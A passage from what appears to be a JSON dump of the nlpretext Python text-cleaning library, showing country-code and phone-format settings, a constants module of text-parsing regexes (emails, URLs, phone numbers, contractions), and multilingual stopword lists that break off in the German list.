\"JM\",\n    \"KN\",\n    \"KY\",\n    \"LC\",\n    \"MP\",\n    \"MS\",\n    \"PR\",\n    \"SX\",\n    \"TC\",\n    \"TT\",\n    \"VC\",\n    \"VG\",\n    \"VI\",\n    \"RU\",\n    \"KZ\",\n    \"EG\",\n    \"ZA\",\n    \"GR\",\n    \"NL\",\n    \"BE\",\n    \"FR\",\n    \"ES\",\n    \"HU\",\n    \"IT\",\n    \"VA\",\n    \"RO\",\n    \"CH\",\n    \"AT\",\n    \"GB\",\n    \"GG\",\n    \"IM\",\n    \"JE\",\n    \"DK\",\n    \"SE\",\n    \"NO\",\n    \"SJ\",\n    \"PL\",\n    \"DE\",\n    \"PE\",\n    \"MX\",\n    \"CU\",\n    \"AR\",\n    \"BR\",\n    \"CL\",\n    \"CO\",\n    \"VE\",\n    \"MY\",\n    \"AU\",\n    \"CC\",\n    \"CX\",\n    \"ID\",\n    \"PH\",\n    \"NZ\",\n    \"SG\",\n    \"TH\",\n    \"JP\",\n    \"KR\",\n    \"VN\",\n    \"CN\",\n    \"TR\",\n    \"IN\",\n    \"PK\",\n    \"AF\",\n    \"LK\",\n    \"MM\",\n    \"IR\",\n    \"SS\",\n    \"MA\",\n    \"EH\",\n    \"DZ\",\n    \"TN\",\n    \"LY\",\n    \"GM\",\n    \"SN\",\n    \"MR\",\n    \"ML\",\n    \"GN\",\n    \"CI\",\n    \"BF\",\n    \"NE\",\n    \"TG\",\n    \"BJ\",\n    \"MU\",\n  
  \"LR\",\n    \"SL\",\n    \"GH\",\n    \"NG\",\n    \"TD\",\n    \"CF\",\n    \"CM\",\n    \"CV\",\n    \"ST\",\n    \"GQ\",\n    \"GA\",\n    \"CG\",\n    \"CD\",\n    \"AO\",\n    \"GW\",\n    \"IO\",\n    \"AC\",\n    \"SC\",\n    \"SD\",\n    \"RW\",\n    \"ET\",\n    \"SO\",\n    \"DJ\",\n    \"KE\",\n    \"TZ\",\n    \"UG\",\n    \"BI\",\n    \"MZ\",\n    \"ZM\",\n    \"MG\",\n    \"RE\",\n    \"YT\",\n    \"ZW\",\n    \"NA\",\n    \"MW\",\n    \"LS\",\n    \"BW\",\n    \"SZ\",\n    \"KM\",\n    \"SH\",\n    \"TA\",\n    \"ER\",\n    \"AW\",\n    \"FO\",\n    \"GL\",\n    \"GI\",\n    \"PT\",\n    \"LU\",\n    \"IE\",\n    \"IS\",\n    \"AL\",\n    \"MT\",\n    \"CY\",\n    \"FI\",\n    \"AX\",\n    \"BG\",\n    \"LT\",\n    \"LV\",\n    \"EE\",\n    \"MD\",\n    \"AM\",\n    \"BY\",\n    \"AD\",\n    \"MC\",\n    \"SM\",\n    \"UA\",\n    \"RS\",\n    \"ME\",\n    \"XK\",\n    \"HR\",\n    \"SI\",\n    \"BA\",\n    \"MK\",\n    \"CZ\",\n    \"SK\",\n    \"LI\",\n    \"FK\",\n    \"BZ\",\n    \"GT\",\n    \"SV\",\n    \"HN\",\n    \"NI\",\n    \"CR\",\n    \"PA\",\n    \"PM\",\n    \"HT\",\n    \"GP\",\n    \"BL\",\n    \"MF\",\n    \"BO\",\n    \"GY\",\n    \"EC\",\n    \"GF\",\n    \"PY\",\n    \"MQ\",\n    \"SR\",\n    \"UY\",\n    \"CW\",\n    \"BQ\",\n    \"TL\",\n    \"NF\",\n    \"BN\",\n    \"NR\",\n    \"PG\",\n    \"TO\",\n    \"SB\",\n    \"VU\",\n    \"FJ\",\n    \"PW\",\n    \"WF\",\n    \"CK\",\n    \"NU\",\n    \"WS\",\n    \"KI\",\n    \"NC\",\n    \"TV\",\n    \"PF\",\n    \"TK\",\n    \"FM\",\n    \"MH\",\n    \"KP\",\n    \"HK\",\n    \"MO\",\n    \"KH\",\n    \"LA\",\n    \"BD\",\n    \"TW\",\n    \"MV\",\n    \"LB\",\n    \"JO\",\n    \"SY\",\n    \"IQ\",\n    \"KW\",\n    \"SA\",\n    \"YE\",\n    \"OM\",\n    \"PS\",\n    \"AE\",\n    \"IL\",\n    \"BH\",\n    \"QA\",\n    \"BT\",\n    \"MN\",\n    \"NP\",\n    \"TJ\",\n    \"TM\",\n    \"AZ\",\n    \"GE\",\n    \"KG\",\n    \"UZ\",\n    \"DO\",\n]\n\nFORMAT_NUMBERS = {\n    \"E164\": 
_phonenumbers.PhoneNumberFormat.E164,\n    \"INTERNATIONAL\": _phonenumbers.PhoneNumberFormat.INTERNATIONAL,\n    \"NATIONAL\": _phonenumbers.PhoneNumberFormat.NATIONAL,\n    \"RFC3966\": _phonenumbers.PhoneNumberFormat.RFC3966,\n}\n"
  },
  {
    "path": "nlpretext/_config/constants.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n# mypy: disable-error-code=\"attr-defined\"\n\n\"\"\"\nCollection of regular expressions and other (small, generally useful) constants.\nCredits to textacy for some of them: https://github.com/chartbeat-labs/textacy.\n\"\"\"\nimport re\nimport sys\nimport unicodedata\n\nimport regex\n\nNUMERIC_NE_TYPES = {\n    \"ORDINAL\",\n    \"CARDINAL\",\n    \"MONEY\",\n    \"QUANTITY\",\n    \"PERCENT\",\n    \"TIME\",\n    \"DATE\",\n}\nSUBJ_DEPS = {\"agent\", \"csubj\", \"csubjpass\", \"expl\", \"nsubj\", \"nsubjpass\"}\nOBJ_DEPS = {\"attr\", \"dobj\", \"dative\", \"oprd\"}\nAUX_DEPS = {\"aux\", \"auxpass\", \"neg\"}\n\nREPORTING_VERBS = {\n    \"according\",\n    \"accuse\",\n    \"acknowledge\",\n    \"add\",\n    \"admit\",\n    \"agree\",\n    \"allege\",\n    \"announce\",\n    \"argue\",\n    \"ask\",\n    \"assert\",\n    \"believe\",\n    \"blame\",\n    \"charge\",\n    \"cite\",\n    \"claim\",\n    \"complain\",\n    \"concede\",\n    \"conclude\",\n    \"confirm\",\n    \"contend\",\n    \"criticize\",\n    \"declare\",\n    \"decline\",\n    \"deny\",\n    \"describe\",\n    \"disagree\",\n    \"disclose\",\n    \"estimate\",\n    \"explain\",\n    \"fear\",\n    \"hope\",\n    \"insist\",\n    \"maintain\",\n    \"mention\",\n    \"note\",\n    \"observe\",\n    \"order\",\n    \"predict\",\n    \"promise\",\n    \"recall\",\n  
  \"recommend\",\n    \"reply\",\n    \"report\",\n    \"say\",\n    \"state\",\n    \"stress\",\n    \"suggest\",\n    \"tell\",\n    \"testify\",\n    \"think\",\n    \"urge\",\n    \"warn\",\n    \"worry\",\n    \"write\",\n}\n\nCURRENCIES = {\n    \"$\": \"USD\",\n    \"zł\": \"PLN\",\n    \"£\": \"GBP\",\n    \"¥\": \"JPY\",\n    \"฿\": \"THB\",\n    \"₡\": \"CRC\",\n    \"₦\": \"NGN\",\n    \"₩\": \"KRW\",\n    \"₪\": \"ILS\",\n    \"₫\": \"VND\",\n    \"€\": \"EUR\",\n    \"₱\": \"PHP\",\n    \"₲\": \"PYG\",\n    \"₴\": \"UAH\",\n    \"₹\": \"INR\",\n}\n\nPOS_REGEX_PATTERNS = {\n    \"en\": {\n        \"NP\": r\"<DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN>|<PROPN> <PART>?)+\",\n        \"PP\": r\"<ADP> <DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN> <PART>?)+\",\n        \"VP\": r\"<AUX>* <ADV>* <VERB>\",\n    }\n}\n\nPUNCT_TRANSLATE_UNICODE = dict.fromkeys(\n    (i for i in range(sys.maxunicode) if unicodedata.category(chr(i)).startswith(\"P\")),\n    \" \",\n)\n\n\nACRONYM_REGEX = re.compile(\n    r\"(?:^|(?<=\\W))(?:(?:(?:(?:[A-Z]\\.?)+[a-z0-9&/-]?)+(?:[A-Z][s.]?|[0-9]s?))|(?:[0-9](?:\\-?[A-Z])+))(?:$|(?=\\W))\",\n    flags=re.UNICODE,\n)\nEMAIL_REGEX = re.compile(\n    r\"(?:^|(?<=[^\\w@.)]))([\\w+-](\\.(?!\\.))?)*?[\\w+-]@(?:\\w-?)*?\\w+(\\.([a-z]{2,})){1,3}(?:$|(?=\\b))\",\n    flags=re.IGNORECASE | re.UNICODE,\n)\nPHONE_REGEX = re.compile(\n    r\"(?:^|(?<=[^\\w)]))(\\+?1[ .-]?)?(\\(?\\d{3}\\)?[ .-]?)?(\\d{3}[ .-]?\\d{4})(\\s?(?:ext\\.?|[#x-])\\s?\\d{2,6})?(?:$|(?=\\W))\"  # noqa: E501\n)\nNUMBERS_REGEX = re.compile(\n    r\"(?:^|(?<=[^\\w,.]))[+–-]?(([1-9]\\d{0,2}(,\\d{3})+(\\.\\d*)?)|([1-9]\\d{0,2}([ .]\\d{3})+(,\\d*)?)|\"\n    r\"(\\d*?[.,]\\d+)|\\d+)(?:$|(?=\\b))\"\n)\nCURRENCY_REGEX = re.compile(\"({})+\".format(\"|\".join(re.escape(c) for c in CURRENCIES)))\nLINEBREAK_REGEX = re.compile(r\"((\\r\\n)|[\\n\\v])+\")\nNONBREAKING_SPACE_REGEX = re.compile(r\"(?!\\n)\\s+\")\nURL_REGEX = re.compile(\n    r\"(?:^|(?<![\\w/.]))\"\n    # protocol 
identifier\n    # r\"(?:(?:https?|ftp)://)\"  <-- alt?\n    r\"(?:(?:https?://|mailto:|ftp://|www\\d{0,3}\\.))\"\n    # user:pass authentication\n    r\"(?:\\S+(?::\\S*)?@)?\" r\"(?:\"\n    # IP address exclusion\n    # private & local networks\n    r\"(?!(?:10|127)(?:\\.\\d{1,3}){3})\"\n    r\"(?!(?:169\\.254|192\\.168)(?:\\.\\d{1,3}){2})\"\n    r\"(?!172\\.(?:1[6-9]|2\\d|3[0-1])(?:\\.\\d{1,3}){2})\"\n    # IP address dotted notation octets\n    # excludes loopback network 0.0.0.0\n    # excludes reserved space >= 224.0.0.0\n    # excludes network & broadcast addresses\n    # (first & last IP address of each class)\n    r\"(?:[1-9]\\d?|1\\d\\d|2[01]\\d|22[0-3])\"\n    r\"(?:\\.(?:1?\\d{1,2}|2[0-4]\\d|25[0-5])){2}\"\n    r\"(?:\\.(?:[1-9]\\d?|1\\d\\d|2[0-4]\\d|25[0-4]))\"\n    r\"|\"\n    # host name\n    r\"(?:(?:[a-z\\u00a1-\\uffff0-9]-?)*[a-z\\u00a1-\\uffff0-9]+)\"\n    # domain name\n    r\"(?:\\.(?:[a-z\\u00a1-\\uffff0-9]-?)*[a-z\\u00a1-\\uffff0-9]+)*\"\n    # TLD identifier\n    r\"(?:\\.(?:[a-z\\u00a1-\\uffff]{2,}))\" r\")\"\n    # port number\n    r\"(?::\\d{2,5})?\"\n    # resource path\n    r\"(?:/\\S*)?\" r\"(?:$|(?![\\w?!+&/]))\",\n    flags=re.UNICODE | re.IGNORECASE,\n)  # source: https://gist.github.com/dperini/729294\nSHORT_URL_REGEX = re.compile(\n    r\"(?:^|(?<![\\w/.]))\"\n    # optional scheme\n    r\"(?:(?:https?://)?)\"\n    # domain\n    r\"(?:\\w-?)*?\\w+(?:\\.[a-z]{2,12}){1,3}\" r\"/\"\n    # hash\n    r\"[^\\s.,?!'\\\"|+]{2,12}\" r\"(?:$|(?![\\w?!+&/]))\",\n    flags=re.IGNORECASE,\n)\n\n# regexes for cleaning up crufty terms\nDANGLING_PARENS_TERM_RE = re.compile(\n    r\"(?:\\s|^)(\\()\\s{1,2}(.*?)\\s{1,2}(\\))(?:\\s|$)\", flags=re.UNICODE\n)\nLEAD_TAIL_CRUFT_TERM_RE = re.compile(r\"^([^\\w(-] ?)+|([^\\w).!?] 
?)+$\", flags=re.UNICODE)\nLEAD_HYPHEN_TERM_RE = re.compile(r\"^-([^\\W\\d_])\", flags=re.UNICODE)\nNEG_DIGIT_TERM_RE = re.compile(r\"(-) (\\d)\", flags=re.UNICODE)\nWEIRD_HYPHEN_SPACE_TERM_RE = re.compile(r\"(?<=[^\\W\\d]) (-[^\\W\\d])\", flags=re.UNICODE)\nWEIRD_APOSTR_SPACE_TERM_RE = re.compile(r\"([^\\W\\d]+) ('[a-z]{1,2}\\b)\", flags=re.UNICODE)\nLATIN_CHARACTERS_RE = regex.compile(r\"[^\\p{Latin}1-9]\")\n\n# ENGLISH CONTRACTIONS\nCONTRACTION_NT_NOT = re.compile(\n    r\"(\\b)(are|could|did|does|do|had|has|have|is|might|must|should|were|would)n't\", re.IGNORECASE\n)\nCONTRACTION_LL_WILL = re.compile(r\"(\\b)(he|i|she|they|we|what|who|you)'ll\", re.IGNORECASE)\nCONTRACTION_RE_ARE = re.compile(r\"(\\b)(they|we|what|who|you)'re\", re.IGNORECASE)\nCONTRACTION_VE_HAVE = re.compile(r\"(\\b)(i|should|they|we|what|who|would|you)'ve\", re.IGNORECASE)\nCONTRACTION_CANT_CANNOT = re.compile(r\"(\\b)(ca)n't\", re.IGNORECASE)\nCONTRACTION_M_AM = re.compile(r\"(\\b)(i)'m\", re.IGNORECASE)\nCONTRACTION_LET_LETUS = re.compile(r\"(\\b)(let)'s\", re.IGNORECASE)\nCONTRACTION_WONT_WILLNOT = re.compile(r\"(\\b)(w)on't\", re.IGNORECASE)\nCONTRACTION_SHANT_SHALLNOT = re.compile(r\"(\\b)(s)han't\", re.IGNORECASE)\nCONTRACTION_YALL_YOUALL = re.compile(r\"(\\b)(y)(?:'all|a'll)\", re.IGNORECASE)\n\n# SOCIAL DATA\nHASHTAG_PATTERN = re.compile(r\"#\\w*\")\nAT_PATTERN = re.compile(r\"@\\w*\")\nHTML_TAG_PATTERN = re.compile(r\"<.*?>\")\n\n# TEXT LOADER\nTEXT_FILE_FORMATS_PATTERN = re.compile(r\"^.*\\.(json|csv|txt|parquet)(\\.gz|\\.zip)*$\")\n"
  },
  {
    "path": "nlpretext/_config/stopwords.py",
    "content": "STOPWORDS = {\n    \"af\": [\n        \"'n\",\n        \"aan\",\n        \"af\",\n        \"al\",\n        \"as\",\n        \"baie\",\n        \"by\",\n        \"daar\",\n        \"dag\",\n        \"dat\",\n        \"die\",\n        \"dit\",\n        \"een\",\n        \"ek\",\n        \"en\",\n        \"gaan\",\n        \"gesê\",\n        \"haar\",\n        \"het\",\n        \"hom\",\n        \"hulle\",\n        \"hy\",\n        \"in\",\n        \"is\",\n        \"jou\",\n        \"jy\",\n        \"kan\",\n        \"kom\",\n        \"ma\",\n        \"maar\",\n        \"met\",\n        \"my\",\n        \"na\",\n        \"nie\",\n        \"om\",\n        \"ons\",\n        \"op\",\n        \"saam\",\n        \"sal\",\n        \"se\",\n        \"sien\",\n        \"so\",\n        \"sy\",\n        \"te\",\n        \"toe\",\n        \"uit\",\n        \"van\",\n        \"vir\",\n        \"was\",\n        \"wat\",\n        \"ŉ\",\n    ],\n    \"ha\": [\n        \"a\",\n        \"amma\",\n        \"ba\",\n        \"ban\",\n        \"ce\",\n        \"cikin\",\n        \"da\",\n        \"don\",\n        \"ga\",\n        \"in\",\n        \"ina\",\n        \"ita\",\n        \"ji\",\n        \"ka\",\n        \"ko\",\n        \"kuma\",\n        \"lokacin\",\n        \"ma\",\n        \"mai\",\n        \"na\",\n        \"ne\",\n        \"ni\",\n        \"sai\",\n        \"shi\",\n        \"su\",\n        \"suka\",\n        \"sun\",\n        \"ta\",\n        \"tafi\",\n        \"take\",\n        \"tana\",\n        \"wani\",\n        \"wannan\",\n        \"wata\",\n        \"ya\",\n        \"yake\",\n        \"yana\",\n        \"yi\",\n        \"za\",\n    ],\n    \"so\": [\n        \"aad\",\n        \"albaabkii\",\n        \"atabo\",\n        \"ay\",\n        \"ayaa\",\n        \"ayee\",\n        \"ayuu\",\n        \"dhan\",\n        \"hadana\",\n        \"in\",\n        \"inuu\",\n        \"isku\",\n        \"jiray\",\n        \"jirtay\",\n        \"ka\",\n        
\"kale\",\n        \"kasoo\",\n        \"ku\",\n        \"kuu\",\n        \"lakin\",\n        \"markii\",\n        \"oo\",\n        \"si\",\n        \"soo\",\n        \"uga\",\n        \"ugu\",\n        \"uu\",\n        \"waa\",\n        \"waxa\",\n        \"waxuu\",\n    ],\n    \"st\": [\n        \"a\",\n        \"ba\",\n        \"bane\",\n        \"bona\",\n        \"e\",\n        \"ea\",\n        \"eaba\",\n        \"empa\",\n        \"ena\",\n        \"ha\",\n        \"hae\",\n        \"hape\",\n        \"ho\",\n        \"hore\",\n        \"ka\",\n        \"ke\",\n        \"la\",\n        \"le\",\n        \"li\",\n        \"me\",\n        \"mo\",\n        \"moo\",\n        \"ne\",\n        \"o\",\n        \"oa\",\n        \"re\",\n        \"sa\",\n        \"se\",\n        \"tloha\",\n        \"tsa\",\n        \"tse\",\n    ],\n    \"sw\": [\n        \"akasema\",\n        \"alikuwa\",\n        \"alisema\",\n        \"baada\",\n        \"basi\",\n        \"bila\",\n        \"cha\",\n        \"chini\",\n        \"hadi\",\n        \"hapo\",\n        \"hata\",\n        \"hivyo\",\n        \"hiyo\",\n        \"huku\",\n        \"huo\",\n        \"ili\",\n        \"ilikuwa\",\n        \"juu\",\n        \"kama\",\n        \"karibu\",\n        \"katika\",\n        \"kila\",\n        \"kima\",\n        \"kisha\",\n        \"kubwa\",\n        \"kutoka\",\n        \"kuwa\",\n        \"kwa\",\n        \"kwamba\",\n        \"kwenda\",\n        \"kwenye\",\n        \"la\",\n        \"lakini\",\n        \"mara\",\n        \"mdogo\",\n        \"mimi\",\n        \"mkubwa\",\n        \"mmoja\",\n        \"moja\",\n        \"muda\",\n        \"mwenye\",\n        \"na\",\n        \"naye\",\n        \"ndani\",\n        \"ng\",\n        \"ni\",\n        \"nini\",\n        \"nonkungu\",\n        \"pamoja\",\n        \"pia\",\n        \"sana\",\n        \"sasa\",\n        \"sauti\",\n        \"tafadhali\",\n        \"tena\",\n        \"tu\",\n        \"vile\",\n        \"wa\",\n       
 \"wakati\",\n        \"wake\",\n        \"walikuwa\",\n        \"wao\",\n        \"watu\",\n        \"wengine\",\n        \"wote\",\n        \"ya\",\n        \"yake\",\n        \"yangu\",\n        \"yao\",\n        \"yeye\",\n        \"yule\",\n        \"za\",\n        \"zaidi\",\n        \"zake\",\n    ],\n    \"yo\": [\n        \"a\",\n        \"an\",\n        \"bá\",\n        \"bí\",\n        \"bẹ̀rẹ̀\",\n        \"fún\",\n        \"fẹ́\",\n        \"gbogbo\",\n        \"inú\",\n        \"jù\",\n        \"jẹ\",\n        \"jẹ́\",\n        \"kan\",\n        \"kì\",\n        \"kí\",\n        \"kò\",\n        \"láti\",\n        \"lè\",\n        \"lọ\",\n        \"mi\",\n        \"mo\",\n        \"máa\",\n        \"mọ̀\",\n        \"ni\",\n        \"náà\",\n        \"ní\",\n        \"nígbà\",\n        \"nítorí\",\n        \"nǹkan\",\n        \"o\",\n        \"padà\",\n        \"pé\",\n        \"púpọ̀\",\n        \"pẹ̀lú\",\n        \"rẹ̀\",\n        \"sì\",\n        \"sí\",\n        \"sínú\",\n        \"ṣ\",\n        \"ti\",\n        \"tí\",\n        \"wà\",\n        \"wá\",\n        \"wọn\",\n        \"wọ́n\",\n        \"yìí\",\n        \"àti\",\n        \"àwọn\",\n        \"é\",\n        \"í\",\n        \"òun\",\n        \"ó\",\n        \"ń\",\n        \"ńlá\",\n        \"ṣe\",\n        \"ṣé\",\n        \"ṣùgbọ́n\",\n        \"ẹmọ́\",\n        \"ọjọ́\",\n        \"ọ̀pọ̀lọpọ̀\",\n    ],\n    \"zu\": [\n        \"futhi\",\n        \"kahle\",\n        \"kakhulu\",\n        \"kanye\",\n        \"khona\",\n        \"kodwa\",\n        \"kungani\",\n        \"kusho\",\n        \"la\",\n        \"lakhe\",\n        \"lapho\",\n        \"mina\",\n        \"ngesikhathi\",\n        \"nje\",\n        \"phansi\",\n        \"phezulu\",\n        \"u\",\n        \"ukuba\",\n        \"ukuthi\",\n        \"ukuze\",\n        \"uma\",\n        \"wahamba\",\n        \"wakhe\",\n        \"wami\",\n        \"wase\",\n        \"wathi\",\n        \"yakhe\",\n        \"zakhe\",\n        
\"zonke\",\n    ],\n    \"da\": [\n        \"af\",\n        \"alle\",\n        \"andet\",\n        \"andre\",\n        \"at\",\n        \"begge\",\n        \"da\",\n        \"de\",\n        \"den\",\n        \"denne\",\n        \"der\",\n        \"deres\",\n        \"det\",\n        \"dette\",\n        \"dig\",\n        \"din\",\n        \"dog\",\n        \"du\",\n        \"ej\",\n        \"eller\",\n        \"en\",\n        \"end\",\n        \"ene\",\n        \"eneste\",\n        \"enhver\",\n        \"et\",\n        \"fem\",\n        \"fire\",\n        \"flere\",\n        \"fleste\",\n        \"for\",\n        \"fordi\",\n        \"forrige\",\n        \"fra\",\n        \"få\",\n        \"før\",\n        \"god\",\n        \"han\",\n        \"hans\",\n        \"har\",\n        \"hendes\",\n        \"her\",\n        \"hun\",\n        \"hvad\",\n        \"hvem\",\n        \"hver\",\n        \"hvilken\",\n        \"hvis\",\n        \"hvor\",\n        \"hvordan\",\n        \"hvorfor\",\n        \"hvornår\",\n        \"i\",\n        \"ikke\",\n        \"ind\",\n        \"ingen\",\n        \"intet\",\n        \"jeg\",\n        \"jeres\",\n        \"kan\",\n        \"kom\",\n        \"kommer\",\n        \"lav\",\n        \"lidt\",\n        \"lille\",\n        \"man\",\n        \"mand\",\n        \"mange\",\n        \"med\",\n        \"meget\",\n        \"men\",\n        \"mens\",\n        \"mere\",\n        \"mig\",\n        \"ned\",\n        \"ni\",\n        \"nogen\",\n        \"noget\",\n        \"ny\",\n        \"nyt\",\n        \"nær\",\n        \"næste\",\n        \"næsten\",\n        \"og\",\n        \"op\",\n        \"otte\",\n        \"over\",\n        \"på\",\n        \"se\",\n        \"seks\",\n        \"ses\",\n        \"som\",\n        \"stor\",\n        \"store\",\n        \"syv\",\n        \"ti\",\n        \"til\",\n        \"to\",\n        \"tre\",\n        \"ud\",\n        \"var\",\n    ],\n    \"de\": [\n        \"Ernst\",\n        \"Ordnung\",\n        
\"Schluss\",\n        \"a\",\n        \"ab\",\n        \"aber\",\n        \"ach\",\n        \"acht\",\n        \"achte\",\n        \"achten\",\n        \"achter\",\n        \"achtes\",\n        \"ag\",\n        \"alle\",\n        \"allein\",\n        \"allem\",\n        \"allen\",\n        \"aller\",\n        \"allerdings\",\n        \"alles\",\n        \"allgemeinen\",\n        \"als\",\n        \"also\",\n        \"am\",\n        \"an\",\n        \"andere\",\n        \"anderen\",\n        \"andern\",\n        \"anders\",\n        \"au\",\n        \"auch\",\n        \"auf\",\n        \"aus\",\n        \"ausser\",\n        \"ausserdem\",\n        \"außer\",\n        \"außerdem\",\n        \"b\",\n        \"bald\",\n        \"bei\",\n        \"beide\",\n        \"beiden\",\n        \"beim\",\n        \"beispiel\",\n        \"bekannt\",\n        \"bereits\",\n        \"besonders\",\n        \"besser\",\n        \"besten\",\n        \"bin\",\n        \"bis\",\n        \"bisher\",\n        \"bist\",\n        \"c\",\n        \"d\",\n        \"d.h\",\n        \"da\",\n        \"dabei\",\n        \"dadurch\",\n        \"dafür\",\n        \"dagegen\",\n        \"daher\",\n        \"dahin\",\n        \"dahinter\",\n        \"damals\",\n        \"damit\",\n        \"danach\",\n        \"daneben\",\n        \"dank\",\n        \"dann\",\n        \"daran\",\n        \"darauf\",\n        \"daraus\",\n        \"darf\",\n        \"darfst\",\n        \"darin\",\n        \"darum\",\n        \"darunter\",\n        \"darüber\",\n        \"das\",\n        \"dasein\",\n        \"daselbst\",\n        \"dass\",\n        \"dasselbe\",\n        \"davon\",\n        \"davor\",\n        \"dazu\",\n        \"dazwischen\",\n        \"daß\",\n        \"dein\",\n        \"deine\",\n        \"deinem\",\n        \"deiner\",\n        \"dem\",\n        \"dementsprechend\",\n        \"demgegenüber\",\n        \"demgemäss\",\n        \"demgemäß\",\n        \"demselben\",\n        \"demzufolge\",\n       
 \"den\",\n        \"denen\",\n        \"denn\",\n        \"denselben\",\n        \"der\",\n        \"deren\",\n        \"derjenige\",\n        \"derjenigen\",\n        \"dermassen\",\n        \"dermaßen\",\n        \"derselbe\",\n        \"derselben\",\n        \"des\",\n        \"deshalb\",\n        \"desselben\",\n        \"dessen\",\n        \"deswegen\",\n        \"dich\",\n        \"die\",\n        \"diejenige\",\n        \"diejenigen\",\n        \"dies\",\n        \"diese\",\n        \"dieselbe\",\n        \"dieselben\",\n        \"diesem\",\n        \"diesen\",\n        \"dieser\",\n        \"dieses\",\n        \"dir\",\n        \"doch\",\n        \"dort\",\n        \"drei\",\n        \"drin\",\n        \"dritte\",\n        \"dritten\",\n        \"dritter\",\n        \"drittes\",\n        \"du\",\n        \"durch\",\n        \"durchaus\",\n        \"durfte\",\n        \"durften\",\n        \"dürfen\",\n        \"dürft\",\n        \"e\",\n        \"eben\",\n        \"ebenso\",\n        \"ehrlich\",\n        \"ei\",\n        \"ei,\",\n        \"eigen\",\n        \"eigene\",\n        \"eigenen\",\n        \"eigener\",\n        \"eigenes\",\n        \"ein\",\n        \"einander\",\n        \"eine\",\n        \"einem\",\n        \"einen\",\n        \"einer\",\n        \"eines\",\n        \"einige\",\n        \"einigen\",\n        \"einiger\",\n        \"einiges\",\n        \"einmal\",\n        \"eins\",\n        \"elf\",\n        \"en\",\n        \"ende\",\n        \"endlich\",\n        \"entweder\",\n        \"er\",\n        \"erst\",\n        \"erste\",\n        \"ersten\",\n        \"erster\",\n        \"erstes\",\n        \"es\",\n        \"etwa\",\n        \"etwas\",\n        \"euch\",\n        \"euer\",\n        \"eure\",\n        \"f\",\n        \"folgende\",\n        \"früher\",\n        \"fünf\",\n        \"fünfte\",\n        \"fünften\",\n        \"fünfter\",\n        \"fünftes\",\n        \"für\",\n        \"g\",\n        \"gab\",\n        \"ganz\",\n 
       \"ganze\",\n        \"ganzen\",\n        \"ganzer\",\n        \"ganzes\",\n        \"gar\",\n        \"gedurft\",\n        \"gegen\",\n        \"gegenüber\",\n        \"gehabt\",\n        \"gehen\",\n        \"geht\",\n        \"gekannt\",\n        \"gekonnt\",\n        \"gemacht\",\n        \"gemocht\",\n        \"gemusst\",\n        \"genug\",\n        \"gerade\",\n        \"gern\",\n        \"gesagt\",\n        \"geschweige\",\n        \"gewesen\",\n        \"gewollt\",\n        \"geworden\",\n        \"gibt\",\n        \"ging\",\n        \"gleich\",\n        \"gott\",\n        \"gross\",\n        \"grosse\",\n        \"grossen\",\n        \"grosser\",\n        \"grosses\",\n        \"groß\",\n        \"große\",\n        \"großen\",\n        \"großer\",\n        \"großes\",\n        \"gut\",\n        \"gute\",\n        \"guter\",\n        \"gutes\",\n        \"h\",\n        \"habe\",\n        \"haben\",\n        \"habt\",\n        \"hast\",\n        \"hat\",\n        \"hatte\",\n        \"hatten\",\n        \"hattest\",\n        \"hattet\",\n        \"heisst\",\n        \"her\",\n        \"heute\",\n        \"hier\",\n        \"hin\",\n        \"hinter\",\n        \"hoch\",\n        \"hätte\",\n        \"hätten\",\n        \"i\",\n        \"ich\",\n        \"ihm\",\n        \"ihn\",\n        \"ihnen\",\n        \"ihr\",\n        \"ihre\",\n        \"ihrem\",\n        \"ihren\",\n        \"ihrer\",\n        \"ihres\",\n        \"im\",\n        \"immer\",\n        \"in\",\n        \"indem\",\n        \"infolgedessen\",\n        \"ins\",\n        \"irgend\",\n        \"ist\",\n        \"j\",\n        \"ja\",\n        \"jahr\",\n        \"jahre\",\n        \"jahren\",\n        \"je\",\n        \"jede\",\n        \"jedem\",\n        \"jeden\",\n        \"jeder\",\n        \"jedermann\",\n        \"jedermanns\",\n        \"jedes\",\n        \"jedoch\",\n        \"jemand\",\n        \"jemandem\",\n        \"jemanden\",\n        \"jene\",\n        \"jenem\",\n    
    \"jenen\",\n        \"jener\",\n        \"jenes\",\n        \"jetzt\",\n        \"k\",\n        \"kam\",\n        \"kann\",\n        \"kannst\",\n        \"kaum\",\n        \"kein\",\n        \"keine\",\n        \"keinem\",\n        \"keinen\",\n        \"keiner\",\n        \"kleine\",\n        \"kleinen\",\n        \"kleiner\",\n        \"kleines\",\n        \"kommen\",\n        \"kommt\",\n        \"konnte\",\n        \"konnten\",\n        \"kurz\",\n        \"können\",\n        \"könnt\",\n        \"könnte\",\n        \"l\",\n        \"lang\",\n        \"lange\",\n        \"leicht\",\n        \"leide\",\n        \"lieber\",\n        \"los\",\n        \"m\",\n        \"machen\",\n        \"macht\",\n        \"machte\",\n        \"mag\",\n        \"magst\",\n        \"mahn\",\n        \"mal\",\n        \"man\",\n        \"manche\",\n        \"manchem\",\n        \"manchen\",\n        \"mancher\",\n        \"manches\",\n        \"mann\",\n        \"mehr\",\n        \"mein\",\n        \"meine\",\n        \"meinem\",\n        \"meinen\",\n        \"meiner\",\n        \"meines\",\n        \"mensch\",\n        \"menschen\",\n        \"mich\",\n        \"mir\",\n        \"mit\",\n        \"mittel\",\n        \"mochte\",\n        \"mochten\",\n        \"morgen\",\n        \"muss\",\n        \"musst\",\n        \"musste\",\n        \"mussten\",\n        \"muß\",\n        \"mußt\",\n        \"möchte\",\n        \"mögen\",\n        \"möglich\",\n        \"mögt\",\n        \"müssen\",\n        \"müsst\",\n        \"müßt\",\n        \"n\",\n        \"na\",\n        \"nach\",\n        \"nachdem\",\n        \"nahm\",\n        \"natürlich\",\n        \"neben\",\n        \"nein\",\n        \"neue\",\n        \"neuen\",\n        \"neun\",\n        \"neunte\",\n        \"neunten\",\n        \"neunter\",\n        \"neuntes\",\n        \"nicht\",\n        \"nichts\",\n        \"nie\",\n        \"niemand\",\n        \"niemandem\",\n        